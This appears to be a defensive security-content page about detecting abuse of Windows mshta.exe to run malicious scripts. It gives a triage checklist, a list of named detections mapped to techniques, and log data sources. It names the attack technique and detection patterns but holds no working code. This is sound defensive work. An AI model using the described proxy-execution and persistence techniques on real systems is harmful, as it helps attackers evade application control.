Analytics Story: Suspicious MSHTA Activity

Description

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

Why it matters

One common adversary tactic is to bypass application control solutions via the mshta.exe process, which loads Microsoft HTML applications (mshtml.dll) with the .hta suffix. In these cases, attackers use the trusted Windows utility to proxy execution of malicious files, whether an .hta application, javascript, or VBScript. The searches in this story help you detect and investigate suspicious activity that may indicate that an attacker is leveraging mshta.exe to execute malicious code. Triage Validate execution

  1. Determine if MSHTA.exe executed. Validate the OriginalFileName of MSHTA.exe and further PE metadata. If executed outside of c:\windows\system32 or c:\windows\syswow64, it should be highly suspect.
  2. Determine if script code was executed with MSHTA. Situational Awareness The objective of this step is meant to identify suspicious behavioral indicators related to executed of Script code by MSHTA.exe.
  3. Parent process. Is the parent process a known LOLBin? Is the parent process an Office Application?
  4. Module loads. Are the known MSHTA.exe modules being loaded by a non-standard application? Is MSHTA loading any suspicious .DLLs?
  5. Network connections. Any network connections? Review the reputation of the remote IP or domain. Retrieval of script code The objective of this step is to confirm the executed script code is benign or malicious.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
Detect mshta inline hta execution System Binary Proxy Execution, Mshta TTP
Detect mshta renamed System Binary Proxy Execution, Mshta Hunting
Detect MSHTA Url in Command Line System Binary Proxy Execution, Mshta TTP
Detect Prohibited Applications Spawning cmd exe Command and Scripting Interpreter, Windows Command Shell Hunting
Detect Rundll32 Inline HTA Execution System Binary Proxy Execution, Mshta TTP
Registry Keys Used For Persistence Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution TTP
Suspicious mshta child process System Binary Proxy Execution, Mshta TTP
Suspicious mshta spawn System Binary Proxy Execution, Mshta TTP
Windows MSHTA Writing to World Writable Path Mshta TTP

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 12 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows xmlwineventlog XmlWinEventLog:Security

References


Source: GitHub | Version: 2